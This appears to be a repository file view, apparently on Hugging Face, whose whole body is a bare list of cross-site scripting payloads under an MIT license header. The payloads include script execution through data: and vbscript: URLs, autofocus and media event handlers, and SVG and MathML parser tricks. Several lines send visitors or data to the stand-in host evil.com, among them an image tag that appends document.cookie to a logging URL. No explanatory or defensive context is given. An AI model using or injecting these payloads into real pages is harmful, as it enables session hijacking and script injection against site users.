File size: 1,124 Bytes
55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 55fa762 5385b77 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | ---
license: mit
---
<a href="data:text/html,<script>alert(1)</script>">data url</a>
<a href="vbscript:alert(1)">vbscript</a>
<form action="https://evil.com"><button>submit</button></form>
<base href="https://evil.com">
<link rel="stylesheet" href="https://evil.com/steal.css">
<style>@import url('https://evil.com/steal.css');</style>
<meta http-equiv="refresh" content="0;url=https://evil.com">
<object data="https://evil.com/evil.swf"></object>
<embed src="https://evil.com/evil.swf">
<video><source onerror="alert(1)"></video>
<body onload="alert(1)">
<marquee onstart=alert(1)>xss</marquee>
<input onfocus=alert(1) autofocus>
<select autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video autoplay onloadstart=alert(1)><source src="x"></video>
<audio autoplay onloadstart=alert(1)><source src="x"></audio>
<img src="https://evil.com/log?cookie="+document.cookie>
<svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/></svg>
<math><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></math>
|